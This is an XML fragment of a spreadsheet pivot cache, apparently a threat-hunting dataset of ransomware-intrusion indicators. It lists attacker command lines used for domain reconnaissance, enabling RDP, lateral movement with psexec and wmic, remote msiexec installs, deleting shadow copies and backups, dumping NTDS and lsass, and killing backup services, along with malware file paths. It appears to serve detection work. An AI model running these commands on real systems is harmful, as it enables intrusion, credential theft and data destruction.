    <s v="procc-eid0707"/>
    <m/>
    <m/>
    <s v="nltest /dclist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0708"/>
    <m/>
    <m/>
    <s v="net share"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0709"/>
    <m/>
    <m/>
    <s v="net view"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0710"/>
    <m/>
    <m/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0711"/>
    <m/>
    <m/>
    <s v="net group “Enterprise admins” /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0712"/>
    <m/>
    <m/>
    <s v="net group “Domain admins” /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0713"/>
    <m/>
    <m/>
    <s v="mstsc /v xxx"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0714"/>
    <m/>
    <m/>
    <s v="mstsc /v xxx\c$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0715"/>
    <m/>
    <m/>
    <s v="“reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v “fDenyTSConnections” /t REG_DWORD /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0716"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0717"/>
    <m/>
    <m/>
    <s v="“reg add “HKLM\System\CurrentControlSet\Control\Terminal Server|WinStations\RDP-Tcp” /v “UserAuthentication” /t REG_DWORD /d 0 /f”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0718"/>
    <m/>
    <m/>
    <s v="Set-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Terminal Server’-Name “fDenyTSConnections” -Value 0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0719"/>
    <m/>
    <m/>
    <s v="Enable-NetFirewallRule -DisplayGroup “Remote Desktop”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0720"/>
    <m/>
    <m/>
    <s v="“psexec.exe -accepteula -d -s \\&lt;ip _address&gt; &lt;executable _ path&gt;”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0721"/>
    <m/>
    <m/>
    <s v="“cmd /c copy &lt;executable _ path&gt; \\&lt;ip _address&gt;\ADMIN$ /y”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0722"/>
    <m/>
    <m/>
    <s v="“Bitsadmin /transfer debjob /download \\[localuser]\C$\Windows\[Conti].dll C:\Windows\[conti].dll”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0723"/>
    <m/>
    <m/>
    <s v="“PsExec.exe /accepteula @comps##.txt -u “&lt;domain&gt;\&lt;username&gt;” -p “&lt;password&gt;” cmd /c COPY “\\&lt;xxx&gt;\share$\xxx.exe” “C:\windows\temp\””"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0724"/>
    <m/>
    <m/>
    <s v="“reg add HKEY _ LOCAL _ MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG _ DWORD /f”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0725"/>
    <m/>
    <m/>
    <s v="“$windir\$system32\msiexec.exe” /q /I hxxp://27.102.70[.]196/km"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0726"/>
    <m/>
    <m/>
    <s v="“vssadmin delete shadows /all /quiet “"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0727"/>
    <m/>
    <m/>
    <s v="“wbadmin delete catalog -quiet”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0728"/>
    <m/>
    <m/>
    <s v="“bcdedit /set {default} recoveryenabled no”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0729"/>
    <m/>
    <m/>
    <s v="“vssadmin delete shadows /all /quiet”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0730"/>
    <m/>
    <m/>
    <s v="“Get-ComputerRestorePoint | DeleteComputerRestorePoint;”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0731"/>
    <m/>
    <m/>
    <s v="“vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB”,"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0732"/>
    <m/>
    <m/>
    <s v="net stop “Acronis VSS Provider” /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0733"/>
    <m/>
    <m/>
    <s v="net stop “Enterprise Client Service” /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0734"/>
    <m/>
    <m/>
    <s v="net stop “SQLsafe Backup Service” /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0735"/>
    <m/>
    <m/>
    <s v="net stop “SQLsafe Filter Service” /y”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0736"/>
    <m/>
    <m/>
    <s v="net stop “Veeam Backup Catalog Data Service” /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0737"/>
    <m/>
    <m/>
    <s v="net stop AcronisAgent /y"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0738"/>
    <m/>
    <m/>
    <s v="sc.exe config SQLTELEMETRY start=disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0739"/>
    <m/>
    <m/>
    <s v="sc.exe config SQLTELEMETRY$ECWDB2 start=disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0740"/>
    <m/>
    <m/>
    <s v="sc.exe config SQLWriter start=disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0741"/>
    <m/>
    <m/>
    <s v="sc.exe config SstpSvc start= disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0742"/>
    <m/>
    <m/>
    <s v="sc.exe config MBAMService start=disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0743"/>
    <m/>
    <m/>
    <s v="sc.exe config wuauserv start= disabled"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0744"/>
    <m/>
    <m/>
    <s v="iisreset.exe /stop"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0745"/>
    <m/>
    <m/>
    <s v="taskkill /f /im vee*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0746"/>
    <m/>
    <m/>
    <s v="taskkill /f /im postg*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0747"/>
    <m/>
    <m/>
    <s v=" $windir\$system32\DllHost.exe / Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0748"/>
    <m/>
    <m/>
    <s v="$windir\$system32\DllHost.exe / Processid:{D2E7041B-2927–42fb-8E9F-7CE93B6DC937}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0749"/>
    <m/>
    <m/>
    <s v="Invoke-TokenManipulation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0750"/>
    <m/>
    <m/>
    <s v="Get-System"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0751"/>
    <m/>
    <m/>
    <s v="$windir\regedit.exe -single 1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0752"/>
    <m/>
    <m/>
    <s v=" cmd /c “”$user\$temp\update.bat” “"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0753"/>
    <m/>
    <m/>
    <s v="REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce” /V “Virtual PrinterDriver” /t REG _ SZ /F /D “”$user\$appdata\Macromedia\Temporary\WinPrint.exe””"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0754"/>
    <m/>
    <m/>
    <s v="$windir\$system32\cmd.exe /k C:\Windows\inf\usbhub\explorer.exe -f C:\Windows\inf\usbhub\config.log"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0755"/>
    <m/>
    <m/>
    <s v="“ntdsutil “ac in ntds” “ifm” “cr fu C:\Perflogs\1” q q “"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0756"/>
    <m/>
    <m/>
    <s v="$windir\$system32\WindowsPowerShell\_x000a_v1.0\powershell.exe -nop -exec bypass -EncodedCommand &lt;base64&gt;"/>
    <s v="$windir\$system32\inetsrv\w3wp.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0757"/>
    <m/>
    <m/>
    <s v="cmd /c c:\\users\\public\\compareForFor.hta"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="$programfiles\\Microsoft Office\\Office14\\WINWORD.EXE"/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0758"/>
    <m/>
    <m/>
    <s v="regsvr32 $user\$appdata\Vote1.ocx"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="$programfiles\\Microsoft Office\\Office14\\WINWORD.EXE"/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0759"/>
    <m/>
    <m/>
    <s v="wmic shadowcopy delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0760"/>
    <m/>
    <m/>
    <s v=" wmic /node:&lt;IP _ address&gt; /user:”&lt;domain&gt;\&lt;user&gt;” /password:”&lt;password&gt;” process call create “cmd /c &lt;cobaltstrike _ path&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0761"/>
    <m/>
    <m/>
    <s v="start wmic /node:@C:\share$\comps##.txt /user:” &lt;xxx&gt;.com\&lt;xxx&gt;” /password:”*********” process call create “cmd.exe /c bitsadmin /transfer xxx \\&lt;xxx&gt;\share$\xxx.exe %APPDATA%\xxx.exe&amp;%APPDATA%\xxx.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0762"/>
    <m/>
    <m/>
    <s v="“$windir\$system32\Wbem\WMIC.exe” process where “name like ‘%manage%’” delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0763"/>
    <m/>
    <m/>
    <s v="$windir\\$system32\\schtasks.exe /create /np /sc HOURLY /tn Task /tr \”$windir\\$system32\\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\\Users\\tree.dll\” /st 07:00&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0764"/>
    <m/>
    <m/>
    <s v="$windir\$system32\msiexec.exe /q /I hxxp://&lt;ip&gt;/&lt;resource&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0765"/>
    <m/>
    <m/>
    <s v="$windir\$system32\mshta.exe ‘C:\Users\Public\compareForFor.jpg’ {1E460BD7-F1C3-4B2E-88BF4E770A288AF5} {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0766"/>
    <m/>
    <m/>
    <s v="$windir\$system32\regsvr32.exe C:\Users\Public\compareForFor.jpg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="$windir\$system32\mshta.exe"/>
    <m/>
    <m/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s v="proca-eid0001"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\windows\system32\gpupdate.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1fffff"/>
    <s v="C:\Windows\system32\ntdll.dll+9d1e4|C:\Windows\System32\KERNELBASE.DLL+2bcbe|UNKNOWN(000001B918D70D3D)"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="proca-eid0002"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Tools\cslite.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1010"/>
    <s v="C:\Windows\system32\ntdll.dll+9d1e4|C:\Windows\System32\KERNELBASE.DLL+2bcbe|UNKNOWN(00000225317C6EDF)"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="proca-eid0003"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Tools\cslite.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1010"/>
    <s v="C:\Windows\system32\ntdll.dll+9d1e4|C:\Windows\System32\KERNELBASE.DLL+2bcbe|UNKNOWN(00000225328B6EDF)"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="proca-eid0004"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\WerFault.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1010"/>
    <s v="C:\Windows\system32\ntdll.dll+&lt;random&gt;|C:\Windows\System32\KERNELBASE.DLL+&lt;random&gt;|UNKNOWN(00000&lt;random&gt;)"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="proca-eid0005"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\WerFault.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1fffff"/>
    <s v="C:\Windows\system32\ntdll.dll+&lt;random&gt;|C:\Windows\System32\KERNELBASE.DLL+&lt;random&gt;|C:windows\system32\werfault.exe+&lt;random&gt;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="proca-eid0006"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\WerFault.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1fffff"/>
    <s v="C:\Windows\system32\ntdll.dll+&lt;random&gt;|C:\Windows\system32\ntdll.dll+&lt;random&gt;|c:windowssystem32\kernel32.dll+&lt;random&gt;"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="proca-eid0007"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\windows\system32\dllhost.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1fffff"/>
    <s v="C:\Windows\system32\ntdll.dll+&lt;random&gt;|C:\Windows\System32\KERNELBASE.DLL+&lt;random&gt;|UNKNOWN(00000&lt;random&gt;)"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="proca-eid0008"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\windows\system32\dllhost.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1fffff"/>
    <s v="C:\Windows\system32\ntdll.dll+&lt;random&gt;|C:\Windows\System32\KERNELBASE.DLL+&lt;random&gt;|UNKNOWN(00000&lt;random&gt;)"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="proca-eid0009"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\mstsc.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1010"/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="proca-eid0010"/>
    <m/>
    <m/>
    <s v="runonce.exe"/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1010"/>
    <s v="C:\Windows\system32\ntdll.dll+&lt;random&gt;|C:\Windows\System32\KERNELBASE.DLL+&lt;random&gt;|UNKNOWN(00000&lt;random&gt;)"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="proca-eid0011"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Winows\System32\SearchIndexer.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x21410"/>
    <s v="C:\Windows\SYSTEM32\ntdll.dll+9d2e4|C:\Windows\System32\KERNELBASE.dll+2bcee|C:\Program Files\Common Files\Microsoft Shared\Ink\IpsPlugin.dll+10369|C:\Program Files\Common Files\Microsoft Shared\Ink\IpsPlugin.dll+10b65|C:\Program Files\Common Files\Microsoft Shared\Ink\IpsPlugin.dll+8cb2 "/>
    <m/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file-eid0001"/>
    <m/>
    <s v="Nitrogen Malware"/>
    <m/>
    <s v="c:\users\&lt;&gt;\Downloads\Version\setup.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0002"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\users\&lt;&gt;\Downloads\Version\python311.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0003"/>
    <m/>
    <s v="legit python exe"/>
    <m/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\python.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0004"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\Cryptodrome"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0005"/>
    <m/>
    <s v="sliver "/>
    <m/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\slv.py"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0006"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0007"/>
    <m/>
    <s v="sliver "/>
    <m/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\pythonw.exe worksliv.py"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0008"/>
    <m/>
    <s v="cobalt strike "/>
    <m/>
    <s v="c:\users\&lt;&gt;\AppData\Local\Notepad\pythonw.exe wo14.py"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0009"/>
    <m/>
    <s v="cobalt strike beacone injection"/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0010"/>
    <m/>
    <s v="cobalt strike beacone injection"/>
    <m/>
    <s v="C:\Windows\System32\winlogon.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0011"/>
    <m/>
    <s v="cobalt strike beacone injection"/>
    <m/>
    <s v="C:\Windows\System32\gpupdate.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="file-eid0012"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\users\&lt;&gt;\Desktop\netscan.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="file-eid0013"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\users\&lt;&gt;\Desktop\64-bit\netscan.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="file-eid0014"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Program Files (x86)\ScreenConnect Client (82d6a046a146cb1)\screenconnect.clientservice.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="file-eid0015"/>
    <s v="create"/>
    <s v="alphv binary"/>
    <m/>
    <s v="C:\ProgramData\setup.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="file-eid0016"/>
    <s v="create"/>
    <s v="alphv binary"/>
    <m/>
    <s v="C:\ProgramData\&lt;random&gt;.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="file-eid0017"/>
    <m/>
    <m/>
    <m/>
    <s v="%LOCALAPPDATA%\Temp\toovery.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="file-eid0018"/>
    <m/>
    <m/>
    <m/>
    <s v="&lt;redact&gt;\part_0.zip"/>
    <m/>
    <s v="confucius_cpp.exe"/>
    <m/>
    <s v="confucius_cpp.exe"/>
    <x v="1"/>
  </r>
  <r>
    <s v="file-eid0019"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\Users\Admin\AppData\Local\Temp\is-7NKSV.tmp\Zoom_v_2.00.4.tmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="file-eid0020"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\windows\system\dumpert.exe lsass.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="file-eid0021"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="file-eid0022"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\users\&lt;username&gt;\downloads\gmer\gmer.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="file-eid0023"/>
    <m/>
    <s v="Domain Controller"/>
    <m/>
    <s v="C:\Users\USER\Desktop\info\7z.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="file-eid0024"/>
    <m/>
    <s v="Domain Controller"/>
    <m/>
    <s v="C:\Users\USER\Desktop\info\comps.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="file-eid0025"/>
    <m/>
    <s v="Domain Controller"/>
    <m/>
    <s v="C:\Users\USER\Desktop\info\Get-DataInfo.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="file-eid0026"/>
    <m/>
    <s v="Domain Controller"/>
    <m/>
    <s v="C:\Users\USER\Desktop\info\netscan.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="file-eid0027"/>
    <m/>
    <s v="Domain Controller"/>
    <m/>
    <s v="C:\Users\USER\Desktop\info\start.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="file-eid0028"/>
    <m/>
    <s v="Domain Controller"/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /c &quot;&quot;C:\Users\USER\Desktop\info\start.bat&quot;&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="file-eid0029"/>
    <m/>
    <m/>
    <s v="create"/>
    <s v="c:\users\user\Appdata\local\temp\M1E1626.exe"/>
    <m/>
    <m/>
    <s v="c:\Users\user\Downloads\somthing.exe"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="file-eid0030"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\Temp\adf\ad_group.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0031"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\Temp\adf\trustdmp.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0032"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\Temp\adf\subnets.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0033"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\Temp\adf\ad_ous.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0034"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\Temp\adf\ad_computers.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0035"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\Temp\adf\ad_users.txt "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0036"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\Temp\Dogi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0037"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\share$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0038"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;uname&gt;\AppData\LocalTemp\tdr58DD.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
